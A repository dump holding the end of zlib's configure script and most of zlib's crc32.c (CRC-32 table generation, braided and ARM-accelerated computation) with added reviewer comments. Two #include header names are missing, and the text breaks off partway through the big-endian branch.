/^prefix *=/s#=.*#=$prefix# /^exec_prefix *=/s#=.*#=$exec_prefix# /^libdir *=/s#=.*#=$libdir# /^sharedlibdir *=/s#=.*#=$sharedlibdir# /^includedir *=/s#=.*#=$includedir# /^mandir *=/s#=.*#=$mandir# /^OBJC *=/s#=.*#= $OBJC# /^PIC_OBJC *=/s#=.*#= $PIC_OBJC# /^all: */s#:.*#: $ALL# /^test: */s#:.*#: $TEST# " > Makefile # create zlib.pc with the configure results sed < ${SRCDIR}zlib.pc.in " /^CC *=/s#=.*#=$CC# /^CFLAGS *=/s#=.*#=$CFLAGS# /^CPP *=/s#=.*#=$CPP# /^LDSHARED *=/s#=.*#=$LDSHARED# /^STATICLIB *=/s#=.*#=$STATICLIB# /^SHAREDLIB *=/s#=.*#=$SHAREDLIB# /^SHAREDLIBV *=/s#=.*#=$SHAREDLIBV# /^SHAREDLIBM *=/s#=.*#=$SHAREDLIBM# /^AR *=/s#=.*#=$AR# /^ARFLAGS *=/s#=.*#=$ARFLAGS# /^RANLIB *=/s#=.*#=$RANLIB# /^EXE *=/s#=.*#=$EXE# /^prefix *=/s#=.*#=$prefix# /^exec_prefix *=/s#=.*#=$exec_prefix# /^libdir *=/s#=.*#=$libdir# /^sharedlibdir *=/s#=.*#=$sharedlibdir# /^includedir *=/s#=.*#=$includedir# /^mandir *=/s#=.*#=$mandir# /^LDFLAGS *=/s#=.*#=$LDFLAGS# " | sed -e " s/\@VERSION\@/$VER/g; " > zlib.pc # done leave 0 ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/crc32.c ================================================ /* crc32.c -- compute the CRC-32 of a data stream * Copyright (C) 1995-2022 Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h * * This interleaved implementation of a CRC makes use of pipelined multiple * arithmetic-logic units, commonly found in modern CPU cores. It is due to * Kadatch and Jenkins (2010). See doc/crc-doc.1.0.pdf in this distribution. */ /* @(#) $Id$ */ /* Note on the use of DYNAMIC_CRC_TABLE: there is no mutex or semaphore protection on the static variables used to control the first-use generation of the crc tables. Therefore, if you #define DYNAMIC_CRC_TABLE, you should first call get_crc_table() to initialize the tables before allowing more than one thread to use crc32(). MAKECRCH can be #defined to write out crc32.h. 
A main() routine is also produced, so that this one source file can be compiled to an executable. */ #ifdef MAKECRCH # include # ifndef DYNAMIC_CRC_TABLE # define DYNAMIC_CRC_TABLE # endif /* !DYNAMIC_CRC_TABLE */ #endif /* MAKECRCH */ #include "zutil.h" /* for Z_U4, Z_U8, z_crc_t, and FAR definitions */ /* A CRC of a message is computed on N braids of words in the message, where each word consists of W bytes (4 or 8). If N is 3, for example, then three running sparse CRCs are calculated respectively on each braid, at these indices in the array of words: 0, 3, 6, ..., 1, 4, 7, ..., and 2, 5, 8, ... This is done starting at a word boundary, and continues until as many blocks of N * W bytes as are available have been processed. The results are combined into a single CRC at the end. For this code, N must be in the range 1..6 and W must be 4 or 8. The upper limit on N can be increased if desired by adding more #if blocks, extending the patterns apparent in the code. In addition, crc32.h would need to be regenerated, if the maximum N value is increased. N and W are chosen empirically by benchmarking the execution time on a given processor. The choices for N and W below were based on testing on Intel Kaby Lake i7, AMD Ryzen 7, ARM Cortex-A57, Sparc64-VII, PowerPC POWER9, and MIPS64 Octeon II processors. The Intel, AMD, and ARM processors were all fastest with N=5, W=8. The Sparc, PowerPC, and MIPS64 were all fastest at N=5, W=4. They were all tested with either gcc or clang, all using the -O3 optimization level. Your mileage may vary. */ /* Define N */ #ifdef Z_TESTN # define N Z_TESTN #else # define N 5 #endif #if N < 1 || N > 6 # error N must be in 1..6 #endif /* z_crc_t must be at least 32 bits. z_word_t must be at least as long as z_crc_t. It is assumed here that z_word_t is either 32 bits or 64 bits, and that bytes are eight bits. */ /* Define W and the associated z_word_t type. 
If W is not defined, then a braided calculation is not used, and the
   associated tables and code are not compiled.
 */
/* Z_TESTW-1 != -1 is false when Z_TESTW is defined as 0 or as nothing, so in
   those cases W stays undefined and the braided code is left out. */
#ifdef Z_TESTW
#  if Z_TESTW-1 != -1
#    define W Z_TESTW
#  endif
#else
#  ifdef MAKECRCH
#    define W 8         /* required for MAKECRCH */
#  else
#    if defined(__x86_64__) || defined(__aarch64__)
#      define W 8
#    else
#      define W 4
#    endif
#  endif
#endif
/* Choose z_word_t for the requested W. If W is 8 but no Z_U8 type is defined,
   fall back to 4-byte words; if neither Z_U8 nor Z_U4 is defined, W is
   undefined again and braiding is disabled. */
#ifdef W
#  if W == 8 && defined(Z_U8)
     typedef Z_U8 z_word_t;
#  elif defined(Z_U4)
#    undef W
#    define W 4
     typedef Z_U4 z_word_t;
#  else
#    undef W
#  endif
#endif

/* If available, use the ARM processor CRC32 instruction. */
#if defined(__aarch64__) && defined(__ARM_FEATURE_CRC32) && W == 8
#  define ARMCRC32
#endif

#if defined(W) && (!defined(ARMCRC32) || defined(DYNAMIC_CRC_TABLE))
/*
  Swap the bytes in a z_word_t to convert between little and big endian. Any
  self-respecting compiler will optimize this to a single machine byte-swap
  instruction, if one is available. This assumes that word_t is either 32 bits
  or 64 bits.

  Each term masks out one byte of word and shifts it to the mirrored byte
  position; the terms are then OR-ed together. The function reads nothing but
  its argument.
 */
local z_word_t byte_swap(z_word_t word) {
#  if W == 8
    return
        (word & 0xff00000000000000) >> 56 |
        (word & 0xff000000000000) >> 40 |
        (word & 0xff0000000000) >> 24 |
        (word & 0xff00000000) >> 8 |
        (word & 0xff000000) << 8 |
        (word & 0xff0000) << 24 |
        (word & 0xff00) << 40 |
        (word & 0xff) << 56;
#  else   /* W == 4 */
    return
        (word & 0xff000000) >> 24 |
        (word & 0xff0000) >> 8 |
        (word & 0xff00) << 8 |
        (word & 0xff) << 24;
#  endif
}
#endif

#ifdef DYNAMIC_CRC_TABLE
/* =========================================================================
 * Table of powers of x for combining CRC-32s, filled in by make_crc_table()
 * below.
 */
   local z_crc_t FAR x2n_table[32];
#else
/* =========================================================================
 * Tables for byte-wise and braided CRC-32 calculations, and a table of powers
 * of x for combining CRC-32s, all made by make_crc_table().
 */
#  include "crc32.h"
#endif

/* CRC polynomial.
*/
#define POLY 0xedb88320         /* p(x) reflected, with x^32 implied */

/*
  Return a(x) multiplied by b(x) modulo p(x), where p(x) is the CRC polynomial,
  reflected. For speed, this requires that a not be zero.

  Review note: the only exit from the loop is the break inside the a & m
  branch, so a call with a == 0 never returns. Nothing in this function checks
  for that; every caller has to guarantee a non-zero a.
 */
local z_crc_t multmodp(z_crc_t a, z_crc_t b) {
    z_crc_t m, p;

    m = (z_crc_t)1 << 31;       /* start at the bit that represents x^0 */
    p = 0;
    for (;;) {
        if (a & m) {
            p ^= b;
            /* stop once no bit of a below m is still set */
            if ((a & (m - 1)) == 0)
                break;
        }
        m >>= 1;
        /* shift b right by one, folding in POLY when a one is shifted out */
        b = b & 1 ? (b >> 1) ^ POLY : b >> 1;
    }
    return p;
}

/*
  Return x^(n * 2^k) modulo p(x). Requires that x2n_table[] has been
  initialized.

  k is masked with 31 on every lookup, so the index into x2n_table[] stays in
  0..31 however far k is incremented.

  NOTE(review): the loop ends only when repeated n >>= 1 brings n to zero. n is
  a z_off64_t; if that type is signed and a negative value were passed,
  termination would depend on how the compiler shifts negative values.
  Presumably callers pass only non-negative lengths -- confirm at the call
  sites.
 */
local z_crc_t x2nmodp(z_off64_t n, unsigned k) {
    z_crc_t p;

    p = (z_crc_t)1 << 31;           /* x^0 == 1 */
    while (n) {
        if (n & 1)
            p = multmodp(x2n_table[k & 31], p);
        n >>= 1;
        k++;
    }
    return p;
}

#ifdef DYNAMIC_CRC_TABLE
/* =========================================================================
 * Build the tables for byte-wise and braided CRC-32 calculations, and a table
 * of powers of x for combining CRC-32s.
 */
local z_crc_t FAR crc_table[256];
#ifdef W
   local z_word_t FAR crc_big_table[256];
   local z_crc_t FAR crc_braid_table[W][256];
   local z_word_t FAR crc_braid_big_table[W][256];
   local void braid(z_crc_t [][256], z_word_t [][256], int, int);
#endif
#ifdef MAKECRCH
   local void write_table(FILE *, const z_crc_t FAR *, int);
   local void write_table32hi(FILE *, const z_word_t FAR *, int);
   local void write_table64(FILE *, const z_word_t FAR *, int);
#endif /* MAKECRCH */

/*
  Define a once() function depending on the availability of atomics. If this is
  compiled with DYNAMIC_CRC_TABLE defined, and if CRCs will be computed in
  multiple threads, and if atomics are not available, then get_crc_table() must
  be called to initialize the tables and must return before any threads are
  allowed to compute or combine CRCs.
 */

/* Definition of once functionality. */
typedef struct once_s once_t;

/* Check for the availability of atomics.
*/
#if defined(__STDC__) && __STDC_VERSION__ >= 201112L && \
    !defined(__STDC_NO_ATOMICS__)

/* NOTE(review): the header name after #include is missing on this page.
   atomic_flag, atomic_int, atomic_load and atomic_store used below are
   declared by <stdatomic.h>. */
#include

/* Structure for once(), which must be initialized with ONCE_INIT. */
struct once_s {
    atomic_flag begun;      /* set by the first thread to arrive */
    atomic_int done;        /* set to 1 after init() has returned */
};
#define ONCE_INIT {ATOMIC_FLAG_INIT, 0}

/*
  Run the provided init() function exactly once, even if multiple threads
  invoke once() at the same time. The state must be a once_t initialized with
  ONCE_INIT.

  The thread that wins the test-and-set on begun runs init() and then stores
  done. Every other thread that arrives before done is set busy-waits on done,
  so it makes no progress until the winning thread's init() has returned.
 */
local void once(once_t *state, void (*init)(void)) {
    if (!atomic_load(&state->done)) {
        if (atomic_flag_test_and_set(&state->begun))
            /* another thread is already initializing: spin until it is done */
            while (!atomic_load(&state->done))
                ;
        else {
            init();
            atomic_store(&state->done, 1);
        }
    }
}

#else   /* no atomics */

/* Structure for once(), which must be initialized with ONCE_INIT. */
struct once_s {
    volatile int begun;
    volatile int done;
};
#define ONCE_INIT {0, 0}

/*
  Test and set. Alas, not atomic, but tries to minimize the period of
  vulnerability.

  The read of *flag and the write of 1 are separate statements, so two threads
  can both read 0 here and both be told that they are first.
 */
local int test_and_set(int volatile *flag) {
    int was;

    was = *flag;
    *flag = 1;
    return was;
}

/*
  Run the provided init() function once. This is not thread-safe.

  Because test_and_set() above is not atomic, two threads entering at the same
  time can both run init() while other threads already read the tables. In a
  build that takes this branch, initialization has to be forced from a single
  thread (get_crc_table() does that) before any other thread computes or
  combines CRCs.
 */
local void once(once_t *state, void (*init)(void)) {
    if (!state->done) {
        if (test_and_set(&state->begun))
            while (!state->done)
                ;
        else {
            init();
            state->done = 1;
        }
    }
}

#endif

/* State for once(). */
local once_t made = ONCE_INIT;

/*
  Generate tables for a byte-wise 32-bit CRC calculation on the polynomial:
  x^32+x^26+x^23+x^22+x^16+x^12+x^11+x^10+x^8+x^7+x^5+x^4+x^2+x+1.

  Polynomials over GF(2) are represented in binary, one bit per coefficient,
  with the lowest powers in the most significant bit. Then adding polynomials
  is just exclusive-or, and multiplying a polynomial by x is a right shift by
  one. If we call the above polynomial p, and represent a byte as the
  polynomial q, also with the lowest power in the most significant bit (so the
  byte 0xb1 is the polynomial x^7+x^3+x^2+1), then the CRC is (q*x^32) mod p,
  where a mod b means the remainder after dividing a by b.
This calculation is done using the shift-register method of multiplying and
  taking the remainder. The register is initialized to zero, and for each
  incoming bit, x^32 is added mod p to the register if the bit is a one (where
  x^32 mod p is p+x^32 = x^26+...+1), and the register is multiplied mod p by x
  (which is shifting right by one and adding x^32 mod p if the bit shifted out
  is a one). We start with the highest power (least significant bit) of q and
  repeat for all eight bits of q.

  The table is simply the CRC of all possible eight bit values. This is all the
  information needed to generate CRCs on data a byte at a time for all
  combinations of CRC register values and incoming bytes.

  Fills crc_table[] and x2n_table[], and, when W is defined, crc_big_table[]
  and the two braid tables. It writes to file-scope arrays without any locking
  of its own; it is meant to be run through once().
 */

local void make_crc_table(void) {
    unsigned i, j, n;
    z_crc_t p;

    /* initialize the CRC of bytes tables */
    for (i = 0; i < 256; i++) {
        p = i;
        for (j = 0; j < 8; j++)
            p = p & 1 ? (p >> 1) ^ POLY : p >> 1;
        crc_table[i] = p;
#ifdef W
        crc_big_table[i] = byte_swap(p);
#endif
    }

    /* initialize the x^2^n mod p(x) table */
    p = (z_crc_t)1 << 30;         /* x^1 */
    x2n_table[0] = p;
    /* each entry is the square of the previous one; p is never zero here, as
       multmodp() requires of its first argument */
    for (n = 1; n < 32; n++)
        x2n_table[n] = p = multmodp(p, p);

#ifdef W
    /* initialize the braiding tables -- needs x2n_table[] */
    braid(crc_braid_table, crc_braid_big_table, N, W);
#endif

#ifdef MAKECRCH
    {
        /*
          The crc32.h header file contains tables for both 32-bit and 64-bit
          z_word_t's, and so requires a 64-bit type be available. In that case,
          z_word_t must be defined to be 64-bits. This code then also generates
          and writes out the tables for the case that z_word_t is 32 bits.

          Review note: the file is opened with mode "w" under the fixed
          relative name crc32.h, so an existing crc32.h in the current
          directory is truncated. Apart from the fopen() check, no return
          value of fprintf() or fclose() is examined, so a short write would
          leave an incomplete header without any error being reported.
         */
#if !defined(W) || W != 8
#  error Need a 64-bit integer type in order to generate crc32.h.
#endif
        FILE *out;
        int k, n;       /* this n hides the unsigned n of the outer scope */
        z_crc_t ltl[8][256];
        z_word_t big[8][256];

        out = fopen("crc32.h", "w");
        if (out == NULL) return;

        /* write out little-endian CRC table to crc32.h */
        fprintf(out,
            "/* crc32.h -- tables for rapid CRC calculation\n"
            " * Generated automatically by crc32.c\n */\n"
            "\n"
            "local const z_crc_t FAR crc_table[] = {\n"
            " ");
        write_table(out, crc_table, 256);
        fprintf(out,
            "};\n");

        /* write out big-endian CRC table for 64-bit z_word_t to crc32.h */
        fprintf(out,
            "\n"
            "#ifdef W\n"
            "\n"
            "#if W == 8\n"
            "\n"
            "local const z_word_t FAR crc_big_table[] = {\n"
            " ");
        write_table64(out, crc_big_table, 256);
        fprintf(out,
            "};\n");

        /* write out big-endian CRC table for 32-bit z_word_t to crc32.h */
        fprintf(out,
            "\n"
            "#else /* W == 4 */\n"
            "\n"
            "local const z_word_t FAR crc_big_table[] = {\n"
            " ");
        write_table32hi(out, crc_big_table, 256);
        fprintf(out,
            "};\n"
            "\n"
            "#endif\n");

        /* write out braid tables for each value of N */
        for (n = 1; n <= 6; n++) {
            fprintf(out,
            "\n"
            "#if N == %d\n", n);

            /* compute braid tables for this N and 64-bit word_t */
            braid(ltl, big, n, 8);

            /* write out braid tables for 64-bit z_word_t to crc32.h */
            fprintf(out,
            "\n"
            "#if W == 8\n"
            "\n"
            "local const z_crc_t FAR crc_braid_table[][256] = {\n");
            for (k = 0; k < 8; k++) {
                fprintf(out, " {");
                write_table(out, ltl[k], 256);
                fprintf(out, "}%s", k < 7 ? ",\n" : "");
            }
            fprintf(out,
            "};\n"
            "\n"
            "local const z_word_t FAR crc_braid_big_table[][256] = {\n");
            for (k = 0; k < 8; k++) {
                fprintf(out, " {");
                write_table64(out, big[k], 256);
                fprintf(out, "}%s", k < 7 ? ",\n" : "");
            }
            fprintf(out,
            "};\n");

            /* compute braid tables for this N and 32-bit word_t */
            braid(ltl, big, n, 4);

            /* write out braid tables for 32-bit z_word_t to crc32.h */
            fprintf(out,
            "\n"
            "#else /* W == 4 */\n"
            "\n"
            "local const z_crc_t FAR crc_braid_table[][256] = {\n");
            for (k = 0; k < 4; k++) {
                fprintf(out, " {");
                write_table(out, ltl[k], 256);
                fprintf(out, "}%s", k < 3 ? ",\n" : "");
            }
            fprintf(out,
            "};\n"
            "\n"
            "local const z_word_t FAR crc_braid_big_table[][256] = {\n");
            for (k = 0; k < 4; k++) {
                fprintf(out, " {");
                write_table32hi(out, big[k], 256);
                fprintf(out, "}%s", k < 3 ? ",\n" : "");
            }
            fprintf(out,
            "};\n"
            "\n"
            "#endif\n"
            "\n"
            "#endif\n");
        }
        fprintf(out,
            "\n"
            "#endif\n");

        /* write out zeros operator table to crc32.h */
        fprintf(out,
            "\n"
            "local const z_crc_t FAR x2n_table[] = {\n"
            " ");
        write_table(out, x2n_table, 32);
        fprintf(out,
            "};\n");
        fclose(out);
    }
#endif /* MAKECRCH */
}

#ifdef MAKECRCH

/*
   Write the 32-bit values in table[0..k-1] to out, five per line in
   hexadecimal separated by commas.

   Each value is cast to unsigned long to match the %08lx conversion. The
   return value of fprintf() is not checked.
 */
local void write_table(FILE *out, const z_crc_t FAR *table, int k) {
    int n;

    for (n = 0; n < k; n++)
        fprintf(out, "%s0x%08lx%s", n == 0 || n % 5 ? "" : " ",
                (unsigned long)(table[n]),
                n == k - 1 ? "" : (n % 5 == 4 ? ",\n" : ", "));
}

/*
   Write the high 32-bits of each value in table[0..k-1] to out, five per line
   in hexadecimal separated by commas.

   The shift by 32 needs a z_word_t wider than 32 bits; make_crc_table()
   refuses to compile its MAKECRCH part unless W is 8.
 */
local void write_table32hi(FILE *out, const z_word_t FAR *table, int k) {
    int n;

    for (n = 0; n < k; n++)
        fprintf(out, "%s0x%08lx%s", n == 0 || n % 5 ? "" : " ",
                (unsigned long)(table[n] >> 32),
                n == k - 1 ? "" : (n % 5 == 4 ? ",\n" : ", "));
}

/*
  Write the 64-bit values in table[0..k-1] to out, three per line in
  hexadecimal separated by commas. This assumes that if there is a 64-bit
  type, then there is also a long long integer type, and it is at least 64
  bits. If not, then the type cast and format string can be adjusted
  accordingly.
 */
local void write_table64(FILE *out, const z_word_t FAR *table, int k) {
    int n;

    for (n = 0; n < k; n++)
        fprintf(out, "%s0x%016llx%s", n == 0 || n % 3 ? "" : " ",
                (unsigned long long)(table[n]),
                n == k - 1 ? "" : (n % 3 == 2 ? ",\n" : ", "));
}

/* Actually do the deed. Entry point of the MAKECRCH table generator: it only
   calls make_crc_table(), which writes crc32.h, and always returns 0, also
   when the file could not be opened. */
int main(void) {
    make_crc_table();
    return 0;
}

#endif /* MAKECRCH */

#ifdef W
/*
  Generate the little and big-endian braid tables for the given n and z_word_t
  size w.
Each array must have room for w blocks of 256 elements.

  Rows 0..w-1 of both arrays are written and no bound is checked here, so the
  caller has to pass arrays with at least w rows. Row k of ltl and row
  w - 1 - k of big are filled together; the big entries are the byte-swapped
  ltl entries.
 */
local void braid(z_crc_t ltl[][256], z_word_t big[][256], int n, int w) {
    int k;
    z_crc_t i, p, q;

    for (k = 0; k < w; k++) {
        p = x2nmodp((n * w + 3 - k) << 3, 0);
        ltl[k][0] = 0;
        big[w - 1 - k][0] = 0;
        /* i starts at 1, so the first argument of multmodp() is never zero */
        for (i = 1; i < 256; i++) {
            ltl[k][i] = q = multmodp(i << 24, p);
            big[w - 1 - k][i] = byte_swap(q);
        }
    }
}
#endif

#endif /* DYNAMIC_CRC_TABLE */

/* =========================================================================
 * This function can be used by asm versions of crc32(), and to force the
 * generation of the CRC tables in a threaded application.
 *
 * Returns a pointer to crc_table. With DYNAMIC_CRC_TABLE defined, the tables
 * are first built through once(), so a call made before any other thread is
 * started guarantees that later CRC calls find the tables complete.
 */
const z_crc_t FAR * ZEXPORT get_crc_table(void) {
#ifdef DYNAMIC_CRC_TABLE
    once(&made, make_crc_table);
#endif /* DYNAMIC_CRC_TABLE */
    return (const z_crc_t FAR *)crc_table;
}

/* =========================================================================
 * Use ARM machine instructions if available. This will compute the CRC about
 * ten times faster than the braided calculation. This code does not check for
 * the presence of the CRC instruction at run time. __ARM_FEATURE_CRC32 will
 * only be defined if the compilation specifies an ARM processor architecture
 * that has the instructions. For example, compiling with -march=armv8.1-a or
 * -march=armv8-a+crc, or -march=native if the compile machine has the crc32
 * instructions.
 */
#ifdef ARMCRC32

/*
   Constants empirically determined to maximize speed. These values are from
   measurements on a Cortex-A57. Your mileage may vary.
 */
#define Z_BATCH 3990                /* number of words in a batch */
#define Z_BATCH_ZEROS 0xa10d3d0c    /* computed from Z_BATCH = 3990 */
#define Z_BATCH_MIN 800             /* fewest words in a final batch */

/*
   Update the running CRC-32 in crc with the len bytes at buf and return the
   new value. A null buf returns 0, the initial CRC, whatever crc and len are.

   The function reads exactly len bytes starting at buf and has no other
   knowledge of the buffer, so len must not exceed what the caller owns.

   The result is a CRC: it detects accidental corruption. It is not a keyed or
   cryptographic check and gives no protection against data that was modified
   on purpose.

   NOTE(review): as the comment above says, the instructions are selected at
   compile time only. A binary built this way and run on a core without the
   CRC32 extension would presumably fault on the first crc32b/crc32x --
   confirm the deployment targets.
 */
unsigned long ZEXPORT crc32_z(unsigned long crc, const unsigned char FAR *buf,
                              z_size_t len) {
    z_crc_t val;
    z_word_t crc1, crc2;
    const z_word_t *word;
    z_word_t val0, val1, val2;
    z_size_t last, last2, i;
    z_size_t num;

    /* Return initial CRC, if requested. */
    if (buf == Z_NULL) return 0;

#ifdef DYNAMIC_CRC_TABLE
    once(&made, make_crc_table);
#endif /* DYNAMIC_CRC_TABLE */

    /* Pre-condition the CRC */
    crc = (~crc) & 0xffffffff;

    /* Compute the CRC up to a word boundary. After this loop either len is
       zero or buf is a multiple of 8, so the word loads below are aligned. */
    while (len && ((z_size_t)buf & 7) != 0) {
        len--;
        val = *buf++;
        __asm__ volatile("crc32b %w0, %w0, %w1" : "+r"(crc) : "r"(val));
    }

    /* Prepare to compute the CRC on full 64-bit words word[0..num-1]. len
       keeps only the 0..7 bytes that follow the last full word. */
    word = (z_word_t const *)buf;
    num = len >> 3;
    len &= 7;

    /* Do three interleaved CRCs to realize the throughput of one crc32x
       instruction per cycle. Each CRC is calculated on Z_BATCH words. The
       three CRCs are combined into a single CRC after each set of batches. */
    while (num >= 3 * Z_BATCH) {
        crc1 = 0;
        crc2 = 0;
        for (i = 0; i < Z_BATCH; i++) {
            val0 = word[i];
            val1 = word[i + Z_BATCH];
            val2 = word[i + 2 * Z_BATCH];
            __asm__ volatile("crc32x %w0, %w0, %x1" : "+r"(crc) : "r"(val0));
            __asm__ volatile("crc32x %w0, %w0, %x1" : "+r"(crc1) : "r"(val1));
            __asm__ volatile("crc32x %w0, %w0, %x1" : "+r"(crc2) : "r"(val2));
        }
        word += 3 * Z_BATCH;
        num -= 3 * Z_BATCH;
        /* Z_BATCH_ZEROS is a non-zero constant, as multmodp() requires of its
           first argument */
        crc = multmodp(Z_BATCH_ZEROS, crc) ^ crc1;
        crc = multmodp(Z_BATCH_ZEROS, crc) ^ crc2;
    }

    /* Do one last smaller batch with the remaining words, if there are enough
       to pay for the combination of CRCs. */
    last = num / 3;
    if (last >= Z_BATCH_MIN) {
        last2 = last << 1;
        crc1 = 0;
        crc2 = 0;
        /* the highest index read is last2 + last - 1, which is below num
           because last is num / 3 */
        for (i = 0; i < last; i++) {
            val0 = word[i];
            val1 = word[i + last];
            val2 = word[i + last2];
            __asm__ volatile("crc32x %w0, %w0, %x1" : "+r"(crc) : "r"(val0));
            __asm__ volatile("crc32x %w0, %w0, %x1" : "+r"(crc1) : "r"(val1));
            __asm__ volatile("crc32x %w0, %w0, %x1" : "+r"(crc2) : "r"(val2));
        }
        word += 3 * last;
        num -= 3 * last;
        val = x2nmodp(last, 6);
        crc = multmodp(val, crc) ^ crc1;
        crc = multmodp(val, crc) ^ crc2;
    }

    /* Compute the CRC on any remaining words. */
    for (i = 0; i < num; i++) {
        val0 = word[i];
        __asm__ volatile("crc32x %w0, %w0, %x1" : "+r"(crc) : "r"(val0));
    }
    word += num;

    /* Complete the CRC on any remaining bytes. */
    buf = (const unsigned char FAR *)word;
    while (len) {
        len--;
        val = *buf++;
        __asm__ volatile("crc32b %w0, %w0, %w1" : "+r"(crc) : "r"(val));
    }

    /* Return the CRC, post-conditioned. */
    return crc ^ 0xffffffff;
}

#else

#ifdef W

/*
  Return the CRC of the W bytes in the word_t data, taking the
  least-significant byte of the word as the first byte of data, without any pre
  or post conditioning. This is used to combine the CRCs of each braid.
 */
local z_crc_t crc_word(z_word_t data) {
    int k;
    for (k = 0; k < W; k++)
        data = (data >> 8) ^ crc_table[data & 0xff];
    return (z_crc_t)data;
}

/*
  Counterpart of crc_word() that uses crc_big_table: in each of the W steps
  the most-significant byte of data selects the table entry and data is
  shifted left by eight bits. The result is returned as a z_word_t.
 */
local z_word_t crc_word_big(z_word_t data) {
    int k;
    for (k = 0; k < W; k++)
        data = (data << 8) ^
            crc_big_table[(data >> ((W - 1) << 3)) & 0xff];
    return data;
}

#endif

/* ========================================================================= */
unsigned long ZEXPORT crc32_z(unsigned long crc, const unsigned char FAR *buf,
                              z_size_t len) {
    /* Return initial CRC, if requested. */
    if (buf == Z_NULL) return 0;

#ifdef DYNAMIC_CRC_TABLE
    once(&made, make_crc_table);
#endif /* DYNAMIC_CRC_TABLE */

    /* Pre-condition the CRC */
    crc = (~crc) & 0xffffffff;

#ifdef W

    /* If provided enough bytes, do a braided CRC calculation. */
    if (len >= N * W + W - 1) {
        z_size_t blks;
        z_word_t const *words;
        unsigned endian;
        int k;

        /* Compute the CRC up to a z_word_t boundary. */
        while (len && ((z_size_t)buf & (W - 1)) != 0) {
            len--;
            crc = (crc >> 8) ^ crc_table[(crc ^ *buf++) & 0xff];
        }

        /* Compute the CRC on as many N z_word_t blocks as are available. */
        blks = len / (N * W);
        len -= blks * N * W;
        words = (z_word_t const *)buf;

        /* Do endian check at execution time instead of compile time, since ARM
           processors can change the endianness at execution time. If the
           compiler knows what the endianness will be, it can optimize out the
           check and the unused branch. */
        endian = 1;
        if (*(unsigned char *)&endian) {
            /* Little endian.
*/ z_crc_t crc0; z_word_t word0; #if N > 1 z_crc_t crc1; z_word_t word1; #if N > 2 z_crc_t crc2; z_word_t word2; #if N > 3 z_crc_t crc3; z_word_t word3; #if N > 4 z_crc_t crc4; z_word_t word4; #if N > 5 z_crc_t crc5; z_word_t word5; #endif #endif #endif #endif #endif /* Initialize the CRC for each braid. */ crc0 = crc; #if N > 1 crc1 = 0; #if N > 2 crc2 = 0; #if N > 3 crc3 = 0; #if N > 4 crc4 = 0; #if N > 5 crc5 = 0; #endif #endif #endif #endif #endif /* Process the first blks-1 blocks, computing the CRCs on each braid independently. */ while (--blks) { /* Load the word for each braid into registers. */ word0 = crc0 ^ words[0]; #if N > 1 word1 = crc1 ^ words[1]; #if N > 2 word2 = crc2 ^ words[2]; #if N > 3 word3 = crc3 ^ words[3]; #if N > 4 word4 = crc4 ^ words[4]; #if N > 5 word5 = crc5 ^ words[5]; #endif #endif #endif #endif #endif words += N; /* Compute and update the CRC for each word. The loop should get unrolled. */ crc0 = crc_braid_table[0][word0 & 0xff]; #if N > 1 crc1 = crc_braid_table[0][word1 & 0xff]; #if N > 2 crc2 = crc_braid_table[0][word2 & 0xff]; #if N > 3 crc3 = crc_braid_table[0][word3 & 0xff]; #if N > 4 crc4 = crc_braid_table[0][word4 & 0xff]; #if N > 5 crc5 = crc_braid_table[0][word5 & 0xff]; #endif #endif #endif #endif #endif for (k = 1; k < W; k++) { crc0 ^= crc_braid_table[k][(word0 >> (k << 3)) & 0xff]; #if N > 1 crc1 ^= crc_braid_table[k][(word1 >> (k << 3)) & 0xff]; #if N > 2 crc2 ^= crc_braid_table[k][(word2 >> (k << 3)) & 0xff]; #if N > 3 crc3 ^= crc_braid_table[k][(word3 >> (k << 3)) & 0xff]; #if N > 4 crc4 ^= crc_braid_table[k][(word4 >> (k << 3)) & 0xff]; #if N > 5 crc5 ^= crc_braid_table[k][(word5 >> (k << 3)) & 0xff]; #endif #endif #endif #endif #endif } } /* Process the last block, combining the CRCs of the N braids at the same time. 
*/ crc = crc_word(crc0 ^ words[0]); #if N > 1 crc = crc_word(crc1 ^ words[1] ^ crc); #if N > 2 crc = crc_word(crc2 ^ words[2] ^ crc); #if N > 3 crc = crc_word(crc3 ^ words[3] ^ crc); #if N > 4 crc = crc_word(crc4 ^ words[4] ^ crc); #if N > 5 crc = crc_word(crc5 ^ words[5] ^ crc); #endif #endif #endif #endif #endif words += N; } else { /* Big endian. */ z_word_t crc0, word0, comb; #if N > 1 z_word_t crc1, word1; #if N > 2 z_word_t crc2, word2; #if N > 3 z_word_t crc3, word3; #if N > 4 z_word_t crc4, word4; #if N > 5 z_word_t crc5, word5; #endif #endif #endif #endif #endif /* Initialize the CRC for each braid. */ crc0 = byte_swap(crc); #if N > 1 crc1 = 0; #if N > 2 crc2 = 0; #if N > 3 crc3 = 0; #if N > 4 crc4 = 0; #if N > 5 crc5 = 0; #endif #endif #endif #endif #endif /* Process the first blks-1 blocks, computing the CRCs on each braid independently. */ while (--blks) { /* Load the word for each braid into registers. */ word0 = crc0 ^ words[0]; #if N > 1 word1 = crc1 ^ words[1]; #if N > 2 word2 = crc2 ^ words[2]; #if N > 3 word3 = crc3 ^ words[3]; #if N > 4 word4 = crc4 ^ words[4]; #if N > 5 word5 = crc5 ^ words[5]; #endif #endif #endif #endif #endif words += N; /* Compute and update the CRC for each word. The loop should get unrolled. 
